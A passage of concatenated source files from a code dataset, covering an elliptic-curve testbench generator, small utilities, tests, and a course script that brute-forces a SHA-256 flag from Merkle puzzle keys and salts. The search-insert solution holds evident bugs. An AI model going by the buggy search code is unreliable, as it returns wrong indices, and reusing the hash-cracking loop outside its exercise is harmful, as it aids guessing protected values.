\\\" & LF &\" )\n        self.add_compare( \"    \\\"P        : \\\" & to_string(ecP_sti) & \\\" \\\" & LF &\" )\n        self.add_compare( \"    \\\"n        : \\\" & to_string(n_sti) & \\\" \\\" & LF &\" )\n        self.add_compare( \"    \\\"yield    : \\\" & to_string(ecR_obs) & \\\" \\\" & LF &\" )\n        self.add_compare( \"    \\\"should be: \\\" & to_string(ecR) & \\\" \\\" & LF &\" )\n        self.add_compare( \"    \\\"took \\\" & integer'image(cycle) & \\\" cycles\\\"\")\n        self.add_compare( \"    );\" )\n        self.add_compare( \"else\" )\n        self.add_compare( \"    logger.log_note( LF &\" )\n        self.add_compare( \"    \\\"Transaction number \\\" & integer'image(op_count) & \\\" on\\\" & \\\" \\\" & LF &\" )\n        self.add_compare( \"    \\\"P        : \\\" & to_string(ecP_sti) & \\\" \\\" & LF &\" )\n        self.add_compare( \"    \\\"n        : \\\" & to_string(n_sti) & \\\" \\\" & LF &\" )\n        self.add_compare( \"    \\\"yield    : \\\" & to_string(ecR_obs) & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"took \\\" & integer'image(cycle) & \\\" cycles\\\"\" )\n self.add_compare( \" );\" )\n self.add_compare( \"end if;\" )\n\n op_count = 10\n self.add_action( \"-- Testbench actions\" )\n self.add_action( \"\" )\n\n self.add_action( \"-- Directed tests\" )\n\n # Multiplication by 0\n P = dp.E2.random_element()\n n = Integer(dp.Fp(0))\n R = n * P\n self.add_point_multiplication(dp, P, n, R)\n self.add_action( \"\" )\n\n # Multiplication of point at infinity\n P = dp.E2(0,1,0)\n n = randrange(2**(dp.p.nbits())-1)\n R = n * P\n self.add_point_multiplication(dp, P, n, R)\n self.add_action( \"\" )\n\n self.add_action( \"-- Random tests\" )\n self.add_action( \"-- \" + str(op_count) + \" multiplication of random point (\" + str(dp.p.nbits()) + \" bits elements)\" )\n for i in range(op_count):\n P = dp.E2.random_element()\n n = randrange(2**(dp.p.nbits())-1)\n R = n * P\n self.add_point_multiplication(dp, P, n, R)\n\nclass Epm_point_multiplier(Entity):\n def __init__(self, dp):\n self.id = \"ec/efpm_point_multiplier\"\n self.src = [ \"efpm_point_multiplier.vhd\" ]\n self.dep = [ \"ec/efpm_point_adder_doubler\" ]\n\n def is_compatible_with(self, dp):\n if hasattr(dp, 'E2'):\n return True\n else:\n return False\n\n def get_default_tb(self, dp):\n return TestBench_efpm_point_multiplier(dp, self)\n\nobj = Epm_point_multiplier(dp)","sub_path":"entities/ec/efpm_point_multiplier/efpm_point_multiplier.py","file_name":"efpm_point_multiplier.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5389561","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n给定一个排序数组和一个目标值,如果在数组中找到目标值则返回索引。如果没有,返回到它将会被按顺序插入的位置。\n\n你可以假设在数组中无重复元素。\n\n\n样例\n[1,3,5,6],5 → 2\n\n[1,3,5,6],2 → 1\n\n[1,3,5,6], 7 → 4\n\n[1,3,5,6],0 → 0\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param A : a list of integers\n @param target : an integer to be inserted\n @return : an integer\n \"\"\"\n\n def searchInsert(self, A, target):\n # write your code here\n\n if target > A[len(A)-1]:\n return len(A) + 1\n for i in range(len(A)):\n if A[i] == target:\n return i\n if target > A[i] and target < A[i + 1]:\n return i + 1\n return 0\n\n\ns = Solution()\nresult = s.searchInsert([1, 2, 3, 4], 3)\nresult2 = s.searchInsert([1, 10, 1001, 201, 1001, 10001, 10007], 10008)\nprint(result)\nprint(result2)\n","sub_path":"lintcode/search-insert-position.py","file_name":"search-insert-position.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607319121","text":"import re\nimport csv\nwith open(\"/Users/varru/Documents/Python Scripts/faculty.csv\") as filename:\n reader= csv.reader(filename, delimiter=',')\n x_name=[]\n x_degree=[]\n x_title=[]\n x_email=[]\n for row in reader:\n x_name.append(row[0])\n x_degree.append(row[1])\n x_title.append(row[2])\n x_email.append(row[3])\n\n\nemail=[]\nfor idx, word in enumerate(x_email[1:]):\n e=(word).strip()\n email.append(e)\n el=(re.search(\"([\\w.]+)@([\\w.]+)\",e))\n email.append(el.group())\ndomain=[]\nfor idx, word in enumerate(x_email[1:]):\n dm=word.strip()\n #email.append(e)\n dmn=(re.search(\"@([\\w.]+)\",dm))\n domain.append(dmn.group(1))\nUnique_domain=set(domain)\nprint(Unique_domain)\nprint(\" Number of Unique Email domains {}\".format(len(Unique_domain)))\n\nwith open(\"emails.csv\",'w') as file:\n em=csv.writer(file,delimiter='\\n',dialect='excel')\n 
em.writerow(email)\n\n","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317588797","text":"#Merkle decode python script\n\nimport crypto_tools as crypto\nimport hashlib\n\nword = \"merkle\"\nlength = 10\nhash_list = \"c:/Users/tommy/OneDrive/Documents/crypto1/merkle_list.txt\"\ns256_hash = \"0449f93d9bb16b9657d7c6350ec77d7f577d276743b714af0272c503a2eb01cc\"\n\n#Opens the file of hashes and salts. Returns an array [[salt, hash]]\ndef openHashFile(file):\n\tret_list = []\n\twith open(file, \"r\") as f:\n\t\tfor line in f:\n\t\t\tthis_item = []\n\t\t\tsalt_pos = line.find(\"salt:\") + 5\n\t\t\tthis_item.append(line[salt_pos:salt_pos + 20])\n\t\t\thash_pos = line.find(\"hash:\") + 5\n\t\t\tthis_item.append(line[hash_pos:hash_pos + 40])\n\t\t\t\n\t\t\tret_list.append(this_item)\n\t\n\treturn ret_list\n\t\nctools = crypto.crypto_tools()\n\nmerkle_list = ctools.merkleKeys(word, length)\n\nhash_list = openHashFile(hash_list)\n\n#Build the full list of merkle + hash\nfull_list = []\nfor i in merkle_list:\n\tfor j in hash_list:\n\t\tfull_list.append(\"COMP3441{\" + str(i) + \":\" + str(j[0]) + \"}\")\n\t\t\n#Look for a hash matching the sha256 hash\nprint(\"Checking for SHA256 hash match...\")\ncounter = 0\nfor i in range(0, len(full_list)):\n\ts256_result = hashlib.sha256(full_list[i].encode('utf-8')).hexdigest()\n\tif s256_result == s256_hash:\n\t\tprint(\"* Found a match at #\" + str(i) + \" with \" + full_list[i])\n\n\tprint(s256_result)","sub_path":"merkle_decode.py","file_name":"merkle_decode.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20229505","text":"###############################################################################\n#\n# encrypts the provided input file (AES-128 + CMAC checksum)\n#\n# arg 1: encryption key 32byte string (first 16Bytes is aesDataKey second 16Bytes is aesCmacKey)\n# arg 2: target storage address - the address where the output file will stored\n# arg 3: input file\n# arg 4: output file\n#\n###############################################################################\n\nimport sys\nimport os\nimport struct\nimport hashlib\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import CMAC\n\n###############################################################################\ndef getFileHeader(fileSize, sectorSize):\n data = b'';\n data += struct.pack(\" 0:\n if remainingRd > plainBinFileReadBlockSize:\n rdLen = plainBinFileReadBlockSize\n else:\n rdLen = remainingRd\n\n inputFileChunk = inputFile.read(rdLen)\n remainingRd -= rdLen\n\n if rdLen < plainBinFileReadBlockSize:\n inputFileChunk = paddingSet(inputFileChunk, plainBinFileReadBlockSize - rdLen, b'\\x00')\n\n aesIv = getIv(storageSector)\n encryptedInputFileChunk = aesEncript(inputFileChunk, aesDataKey, aesIv)\n outputFileChunk = encryptedInputFileChunk + checksumGet(aesCmacKey, aesIv, encryptedInputFileChunk)\n outputFile.write(outputFileChunk)\n storageSector += 1\n\noutputFile.close()\ninputFile.close()\n\nprint('file encryption DONE!')\n","sub_path":"Tools/scripts/python/cipherStorageData.py","file_name":"cipherStorageData.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"511412465","text":"import os\nimport tensorflow as tf\nimport numpy 
as np\n\nFILE_PATH_PREFIX = \"data\"\nSRC_TRAIN = \"src-train.txt\"\nTRGT_TRAIN = \"tgt-train.txt\"\nTRAIN_FILES = [SRC_TRAIN, TRGT_TRAIN]\nSRC_VAL = \"src-val.txt\"\nTRGT_VAL = \"tgt-val.txt\"\nVAL_FILES = [SRC_VAL, TRGT_VAL]\n\nDATA_NPZ_NAME = \"data.npz\"\n\n\ndef main():\n \"\"\"\n Trains the transformer and then translates a single sentence..\n :return: None\n \"\"\"\n train_src = read_file(SRC_TRAIN)\n train_tgt = read_file(TRGT_TRAIN)\n val_src = read_file(SRC_VAL)\n val_tgt = read_file(TRGT_VAL)\n # val = read_files(VAL_FILES)\n np.savez(\n DATA_NPZ_NAME, train_src=train_src, train_tgt=train_tgt, val_src=val_src, val_tgt=val_tgt)\n\n\ndef read_file(file_name):\n with open(os.path.join(FILE_PATH_PREFIX, file_name), \"r\") as file:\n return file.readlines()\n\n\n# def read_files(file_names):\n# texts = []\n# for file_name in file_names:\n# texts.append(read_file(file_name))\n# src_and_text = np.array(\n# [(line_src, line_trgt) for line_src, line_trgt in zip(texts[0], texts[1])])\n# return src_and_text\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"text_to_npz.py","file_name":"text_to_npz.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"46905705","text":"import unittest\n\nfrom checkov.terraform.checks.resource.aws.S3BlockPublicACLs import scanner\nfrom checkov.common.models.enums import CheckResult\n\n\nclass TestS3BlockPublicACLs(unittest.TestCase):\n\n def test_failure(self):\n resource_conf = {'bucket':['foo'],\n 'block_public_acls': [False],\n 'block_public_policy': [True],\n 'ignore_public_acls': [True],\n 'restrict_public_buckets': [True]}\n scan_result = scanner.scan_resource_conf(conf=resource_conf)\n self.assertEqual(CheckResult.FAILED, scan_result)\n\n def test_success(self):\n resource_conf = {'bucket':['foo'],\n 'block_public_acls': [True],\n 'block_public_policy': [True],\n 'ignore_public_acls': [True],\n 'restrict_public_buckets': [True]}\n\n scan_result = scanner.scan_resource_conf(conf=resource_conf)\n self.assertEqual(CheckResult.PASSED, scan_result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/terraform/checks/resource/aws/test_S3BlockPublicACLs.py","file_name":"test_S3BlockPublicACLs.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"545971994","text":"from urllib.error import HTTPError\n\nimport urbandict\n\nfrom gaganrobot import gaganrobot, Message\n\n\n@gaganrobot.on_cmd(\"ud\", about={\n 'header': \"Searches Urban Dictionary for the query\",\n 'flags': {'-l': \"limit : defaults to 1\"},\n 'usage': \"{tr}ud [flag] [query]\",\n 'examples': [\"{tr}ud gaganrobot\", \"{tr}ud -l3 gaganrobot\"]})\nasync def urban_dict(message: Message):\n await message.edit(\"Processing...\")\n query = message.filtered_input_str\n if not query:\n await message.err(\"No found any query!\")\n return\n try:\n mean = urbandict.define(query)\n except HTTPError:\n await message.edit(f\"Sorry, couldn't find any results for: `{query}`\", del_in=5)\n return\n output = ''\n limit = int(message.flags.get('-l', 1))\n for i, mean_ in enumerate(mean, start=1):\n output += f\"{i}. 
**{mean_['def']}**\\n\" + \\\n f\" Examples:\\n * `{mean_['example'] or 'not found'}`\\n\\n\"\n if limit <= i:\n break\n if not output:\n await message.edit(f\"No result found for **{query}**\", del_in=5)\n return\n output = f\"**Query:** `{query}`\\n**Limit:** `{limit}`\\n\\n{output}\"\n await message.edit_or_send_as_file(text=output, caption=query)\n","sub_path":"gaganrobot/plugins/utils/ud.py","file_name":"ud.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460219101","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.\nCopyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\nhttp://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\"\"\" # noqa\n\"\"\"\n@summary: 任务流程实例views\n\"\"\"\nfrom common.mymako import render_mako_context\n\n\ndef home(request, biz_cc_id):\n \"\"\"\n @summary: 任务记录首页\n @param request:\n @param biz_cc_id:\n @return:\n \"\"\"\n ctx = {\n \"view_mode\": \"app\",\n \"app_id\": \"\",\n \"template_id\": request.GET.get('template_id', ''),\n }\n return render_mako_context(request, '/core/base_vue.html', ctx)\n","sub_path":"gcloud/taskflow3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617063982","text":"#!/usr/bin/python\nclass motor(object):\n\tdef __init__(self, pin, kv=750, WMin=0, WMax=100):\n\t\tself.powered = False\n\t\tself.__pin = pin\n\t\tself.__kv = kv\n\t\tself.setWLimits(WMin, WMax)\n\t\tself.__W = self.__WMin\n\t\tself.__Wh = 10\n\t\t\n\t\ttry:\n\t\t\tfrom RPIO import PWM\n\t\t\tself.__IO = PWM.Servo()\n\t\texcept ImportError:\n\t\t\tself.simulation = True\n\n\tdef setWLimits(self, WMin, WMax):\n\t\tif WMin < 0:\n\t\t\tWMin = 0\n\t\tself.__WMin = WMin\n\t\tif WMax > 100:\n\t\t\tWMax = 100\n\t\tself.__WMax = WMax\n\n\tdef start(self):\n\t\ttry:\n\t\t\tfrom RPIO import PWM\n\t\t\tself.__IO = PWM.Servo()\n\t\t\tself.powered = True\n\t\texcept ImportError:\n\t\t\tself.simulation = True\n\t\t\tself.powered = False\n\n\tdef stop(self):\n\t\tself.setW(0)\n\t\tif self.powered:\n\t\t\tself.__IO.stop_servo(self.__pin)\n\t\t\tself.powered = False\n\n\tdef increaseW(self, step=1):\n\t\tself.__W = self.__W + step\n\t\tself.setW(self.__W)\n\n\tdef decreaseW(self, step=1):\n\t\tself.__W = self.__W - step\n\t\tself.setW(self.__W)\n\n\tdef getW(self):\n\t\treturn self.__W\n\n\tdef setW(self, W):\n\t\tPW = 0\n\t\tself.__W = W\n\t\tif self.__W < self.__WMin:\n\t\t\tself.__W = self.__WMin\n\t\tif self.__W > self.__WMax:\n\t\t\tself.__W = self.__WMax\n\t\tPW = (1000 + (self.__W) * 10)\n\t\tif self.powered:\n\t\t\tself.__IO.set_servo(self.__pin, PW)","sub_path":"nodeServer/python/motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"349561836","text":"import pygame\nfrom player import Player\nfrom game import Game\nwidth = 600\nheight = 600\nwin = pygame.display.set_mode((width, height))\nchessBoard = pygame.image.load('images/chessBoard.png')\npygame.display.set_caption(\"Client\")\n\n\ndef redrawWindow(win):\n win.fill((102,102,102))\n win.blit(chessBoard, (0,0))\n for p in players:\n p.draw(win)\n for p2 in players2:\n p2.draw(win)\n pygame.display.update()\n\n\n\"\"\"This initializes pieces on board\"\"\"\n\n\nplayers = [Player(i*50, 50, 50, 50, 'pw') for i in range(8)]\nking = Player(150, 0, 50, 50, 'kw')\nqueen = Player(200, 0, 50, 50, 'qw')\nrook = [Player(0, 0, 50, 50, 'rw'), Player(350, 0, 50, 50, 'rw')]\nbishop = [Player(100, 0, 50, 50, 'bw'), Player(250,0,50,50, 'bw')]\nknight = [Player(50, 0, 50, 50, 'nw'), Player(300,0,50,50, 'nw')]\nplayers.append(king)\nplayers.append(queen)\nplayers.extend(rook)\nplayers.extend(bishop)\nplayers.extend(knight)\n\nplayers2 = [Player(i*50, 300, 50, 50, 'p') for i in range(8)]\nking2 = Player(150, 350, 50, 50, 'k')\nqueen2 = Player(200, 350, 50, 50, 'q')\nrook2 = [Player(0, 350, 50, 50, 'r'), Player(350, 350, 50, 50, 'r')]\nbishop2 = [Player(100, 350, 50, 50, 'b'), Player(250,350,50,50, 'b')]\nknight2 = [Player(50, 350, 50, 50, 'n'), Player(300,350,50,50, 'n')]\nplayers2.append(king2)\nplayers2.append(queen2)\nplayers2.extend(rook2)\nplayers2.extend(bishop2)\nplayers2.extend(knight2)\n\nclickCount = 0\n\n\ndef main():\n pygame.init()\n\n g = Game(players[0])\n\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(60)\n if 0 <= g.turnCount < 1:\n g.check_events(players, players2)\n\n elif 1 <= g.turnCount < 2:\n g.check_events(players2, players)\n\n else:\n g.turnCount = 0\n\n redrawWindow(win)\n\nmain()","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252459206","text":"\"\"\"Config singleton class.\n\nIt is defined as a singleton, so it can be easily accessed\nin every application layer.\n\"\"\"\n\nimport os\nimport pycfgr\n# Wikiminer\nfrom wikiminer.meta import Singleton\n\n\nclass Config(pycfgr.Config, metaclass=Singleton):\n \"\"\"Config singleton class.\"\"\"\n\n def __init__(self, config='config.yml', **kwargs):\n \"\"\"Initialization method.\"\"\"\n super().__init__(config=config, **kwargs)\n root_path = self._get_root_path(config)\n self.apply(\n dct=self,\n fields='filename',\n func=lambda x: self._make_dirpath(os.path.join(root_path, x)),\n recursive=True,\n inplace=True\n )\n\n def _get_root_path(self, anchor, path=None):\n \"\"\"Get root path using anchor filename.\"\"\"\n if not path:\n path = os.getcwd()\n files = os.listdir(path)\n if anchor in files:\n return path\n elif path != '/':\n path = os.path.split(path)[0]\n return self._get_root_path(anchor, path)\n else:\n raise RuntimeError(\"Anchor `{}` could not be found.\".format(anchor))\n\n def _make_dirpath(self, path):\n \"\"\"Make dirpath.\"\"\"\n path = os.path.realpath(path)\n if not os.path.exists(path):\n dirpath = os.path.dirname(path)\n os.makedirs(dirpath, exist_ok=True)\n return path\n\n def apply(self, dct, fields, func, recursive=False, inplace=False, **kwargs):\n \"\"\"Apply function to list of fields.\n\n Parameters\n ----------\n dct : dict\n Dictionary-like object to modify.\n fields : str or list\n Field name or list of field names.\n func : func\n Funtion to be applied to fields.\n recursive : bool\n Should apply be recursive.\n 
inplace : bool\n Should inplace modification be used.\n **kwargs :\n Other arguments passed to the function being applied.\n \"\"\"\n if not inplace:\n dct = dct.copy()\n kwfunc = lambda x: func(x, **kwargs)\n if not isinstance(fields, (list, tuple)):\n fields = [ fields ]\n for k, v in dct.items():\n if k in fields:\n dct[k] = kwfunc(v)\n if recursive and isinstance(dct[k], dict):\n dct[k] = self.apply(dct[k], fields, func, recursive, **kwargs)\n if not inplace:\n return dct\n","sub_path":"wikiminer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198841373","text":"import vtk\n\nclass House:\n\n def SetSphere(self,radio): \n self.chapa = vtk.vtkSphereSource()\n self.chapa.SetRadius(radio)\n self.chapa.Update()\n #mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputData(self.chapa.GetOutput())\n return mapper\n \n def SetCone(self,radio,height,resolution):\n self.cone = vtk.vtkConeSource()\n self.cone.SetRadius(radio)\n self.cone.SetHeight(height)\n self.cone.SetResolution(resolution)\n self.cone.SetDirection(0,1,0)\n self.cone.Update()\n #mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputData(self.cone.GetOutput())\n return mapper\n\n def SetCube(self,x,y,z):\n self.cube = vtk.vtkCubeSource()\n self.cube.SetXLength(x)\n self.cube.SetYLength(y)\n self.cube.SetZLength(z)\n self.cube.Update()\n #mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputData(self.cube.GetOutput())\n return mapper\n\n def SetActorCube(self,mapperCube,r,g,b,posX,posY,posZ):\n actor = vtk.vtkActor()\n actor.SetMapper(mapperCube)\n actor.GetProperty().SetColor( r,g,b,)\n actor.SetPosition(posX,posY,posZ)\n return actor\n \n def SetActorSphere(self,mapperSphere,r,g,b,posX,posY,posZ):\n actor = vtk.vtkActor()\n actor.SetMapper(mapperSphere)\n actor.GetProperty().SetColor(r,g,b)\n actor.SetPosition(posX,posY,posZ)\n return actor\n def SetActorCone(self,mapperCone,r,g,b,posX,posY,posZ):\n actor = vtk.vtkActor()\n actor.SetMapper(mapperCone)\n actor.GetProperty().SetColor(r,g,b)\n actor.SetPosition(posX,posY,posZ)\n return actor\n\n\n\n","sub_path":"parcial_1/Lab_1/project/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169740012","text":"from pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SparkSession\n\n\ndef reduceUnifiedDisaster(a,b):\n return [ (a[0] + b[0])*1000000, (a[1] + b[1])*1000, a[2] + b[2]]\n \nif __name__ == \"__main__\":\n\n spark = SparkSession \\\n .builder \\\n .appName(\"weater_app\") \\\n .config(\"spark.some.config.option\", \"some-value\") \\\n .getOrCreate()\n\n df = spark.read \\\n .option(\"header\", \"true\") \\\n .csv(\"hdfs://namenode:8020/weather/Stormdata_2013_red.csv\")\n df.createOrReplaceTempView(\"weather_data\")\n \n\n df = spark.read \\\n .option(\"header\", \"true\") \\\n .csv(\"hdfs://namenode:8020/weather/results/disaster_type_count_by_month.csv\")\n df.createOrReplaceTempView(\"disaste_type_month\")\n\n# Upiti gde se steta meri u milionima\n query = \"\"\" SELECT STATE,MONTH_NAME, EVENT_TYPE FROM weather_data wd\n WHERE NOT EXISTS \n (SELECT MONTH_NAME, STATE,EVENT_TYPE\n FROM disaste_type_month dtm\n WHERE wd.MONTH_NAME = dtm.MONTH_NAME AND wd.STATE = dtm.STATE AND wd.EVENT_TYPE = dtm.EVENT_TYPE)\n GROUP BY MONTH_NAME, STATE,EVENT_TYPE\n ORDER BY STATE ASC \"\"\"\n df_upit = 
spark.sql(query) \n df_upit.show(100)\n df_upit.repartition(1).write.mode('overwrite').csv('hdfs://namenode:8020/weather/results/unusual_disasters_2013')","sub_path":"pr2.py","file_name":"pr2.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502827672","text":"import yaml\nimport logging\n\nfrom datetime import datetime, timedelta\nfrom multiprocessing import Pool\n\nfrom hatfieldcmr.ingest import LocalStorageWrapper\nfrom hatfieldcmr import CMRClient\n\nimport admin.constants as const\n\nlogger = logging.getLogger(__name__)\n\ndef download_granules(envpath: str, date: str, sat: str, days: int = 5):\n \"\"\"Download MODIS/VIIRS granules for a given day\n\n Parameters\n ----------\n envpath : str\n [description]\n sat : str\n [description]\n \"\"\"\n #load_dotenv(envpath)\n envvars = open(envpath ,'r')\n secrets = yaml.load(envvars, Loader=yaml.FullLoader)\n envvars.close()\n \n if sat == 'modis':\n product = {\n 'name': 'daily',\n 'products': ['MOD10A1.6'],\n 'date_span': int(days)-1\n }\n elif sat == 'viirs':\n product = {\n 'name': 'daily',\n 'products': ['VNP10A1F.1'],\n 'date_span': int(days)-1\n }\n else:\n pass\n\n date = date.split('.')\n end_date = datetime(int(date[0]), int(date[1]), int(date[2]))\n storage_wrapper = LocalStorageWrapper(\n const.TOP\n )\n\n ed_client = CMRClient(storage_wrapper, earthdata_user=secrets['EARTHDATA_USER'], earthdata_pass=secrets['EARTHDATA_PASS'])\n start_date = end_date - timedelta(product['date_span'])\n granules = ed_client.query(\n str(start_date.date()),\n str(end_date.date()),\n product,\n bbox=[*const.BBOX]\n )\n print(f\"queried product {product}, got {len(granules)} granules, downloading\")\n try:\n with Pool(4) as p:\n p.map(ed_client.download_granule, granules)\n except KeyboardInterrupt:\n print('Exiting download pool')\n","sub_path":"download_granules/download_granules.py","file_name":"download_granules.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"73611303","text":"\r\n# Libraries\r\nimport pygame\r\nimport time\r\n\r\n# Engine\r\nfrom lecture_versions.engine.game import Game\r\n\r\n# Constants\r\nfrom pygame.constants import *\r\nfrom lecture_versions.engine.constants import *\r\n\r\n# Components\r\nfrom lecture_versions.v3.player import Player\r\nfrom lecture_versions.v3.enemy import Enemy\r\nfrom lecture_versions.v3.barrier import Barrier\r\n\r\n\r\ndef update(timedelta):\r\n # Only the moving objects have to be updated\r\n Enemy.update_all(timedelta)\r\n Player.update_all(timedelta)\r\n\r\n\r\ndef draw(game, player_1, player_2):\r\n\r\n # 1. Draw game elements\r\n game.draw_background()\r\n Barrier.draw_all(game)\r\n Enemy.draw_all(game)\r\n Player.draw_all(game)\r\n\r\n # 2. Draw text in top left corner\r\n if DRAW_HELPERS:\r\n game.draw_text(text=f\"collisions: {player_1.collisions}\",\r\n x_left=5, y_top=5, font_size=20, color=player_1.color)\r\n game.draw_text(text=f\"position: {player_1.position}, velocity: {player_1.velocity}\",\r\n x_left=5, y_top=30, font_size=20, color=player_1.color)\r\n fps_y_top = 55\r\n else:\r\n fps_y_top = 5\r\n\r\n game.draw_text(text=f\"{game.fps * SIMULATION_FRAMES_PER_DRAW} FPS (simulation) \"\r\n f\"{game.fps} FPS (canvas)\", x_left=5, y_top=fps_y_top, font_size=20)\r\n\r\n # 3. Update game window (and fps)\r\n game.update()\r\n\r\n\r\ndef run():\r\n\r\n # 1. 
Initialize game\r\n game = Game(\r\n width=50 * SCALING_FACTOR,\r\n height=20 * SCALING_FACTOR,\r\n print_fps=False, max_fps=MAX_DRAW_FPS\r\n )\r\n\r\n # 2. Initialize players\r\n player_1 = Player(\r\n \"Max\", color=(200, 0, 50), position=(21.5, 12),\r\n keymap={K_w: 'UP', K_a: 'LEFT', K_s: 'DOWN', K_d: 'RIGHT'}\r\n )\r\n player_2 = Player(\r\n \"Moritz\", color=(50, 0, 200), position=(14.5, 12),\r\n keymap={K_UP: 'UP', K_LEFT: 'LEFT', K_DOWN: 'DOWN', K_RIGHT: 'RIGHT'}\r\n )\r\n\r\n # 3. Initialize enemies\r\n for x in range(2, 32, 3):\r\n Enemy(position=(x, 2))\r\n pass\r\n\r\n # 4. Initialize barriers\r\n Barrier(x_left=-1, y_top=21, width=52, height=1) # window top\r\n Barrier(x_left=-1, y_top=1, width=52, height=1) # window bottom\r\n Barrier(x_left=-1, y_top=21, width=1, height=22) # window left\r\n Barrier(x_left=50, y_top=21, width=1, height=22) # window right\r\n\r\n Barrier(x_left=12, y_top=6, width=5, height=1) # step 1\r\n Barrier(x_left=19, y_top=8, width=5, height=1) # step 2\r\n Barrier(x_left=26, y_top=10, width=5, height=1) # step 3\r\n\r\n Barrier(x_left=36, y_top=9, width=2, height=8) # pyramid column 1\r\n Barrier(x_left=38, y_top=7, width=2, height=6) # pyramid column 2\r\n Barrier(x_left=40, y_top=5, width=2, height=4) # pyramid column 3\r\n Barrier(x_left=42, y_top=3, width=2, height=2) # pyramid column 4\r\n\r\n # After game_finish_time has been set from inside check_for_win\r\n # The game will continue to run for 6 seconds and then end\r\n while True:\r\n\r\n # 1. Attach event handler\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game.exit()\r\n\r\n if event.type in (pygame.KEYDOWN, pygame.KEYUP):\r\n if event.key in (pygame.K_w, pygame.K_a, pygame.K_s, pygame.K_d):\r\n player_1.keypress(event.key, event.type == pygame.KEYDOWN)\r\n if event.key in (pygame.K_UP, pygame.K_LEFT, pygame.K_DOWN, pygame.K_RIGHT):\r\n player_2.keypress(event.key, event.type == pygame.KEYDOWN)\r\n\r\n # 2. Update (simulation)\r\n if not SLOWDOWN:\r\n # Collision detection is not fully working with very\r\n # low fps (<< 10 fps)\r\n fps = max(game.fps, MIN_DRAW_FPS)\r\n\r\n # Solution: Simulate multiple time steps per drawing\r\n # because drawing takes > 250 times longer than\r\n # simulating\r\n for i in range(SIMULATION_FRAMES_PER_DRAW):\r\n update(1/(fps * SIMULATION_FRAMES_PER_DRAW))\r\n\r\n else:\r\n # SLOWDOWN can be set to true in order to observe the\r\n # in extreme slow_motion. How many fps with SLOWDOWN\r\n # enabled can be set with SLOWDOWN_FPS\r\n time.sleep((1/SLOWDOWN_FPS) - (1/100))\r\n update(1/100)\r\n\r\n # 3. 
Draw (visualization)\r\n draw(game, player_1, player_2)\r\n","sub_path":"lecture_versions/v3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65718401","text":"from flask import Flask, redirect, session, url_for, request\n\napp = Flask(__name__)\napp.secret_key = 'qwerty'\n\n@app.route('/')\ndef inicio():\n if 'usuario' in session:\n nombre = session['usuario']\n return \"usted está logeado como %s \" % nombre\n else:\n return \"usted no está logeado, dirigirse a login\"\n\n@app.route('/login')\ndef login():\n session['usuario'] = 'alejandro'\n return redirect(url_for('inicio'))\n\n\nif __name__ == '__main__':\n 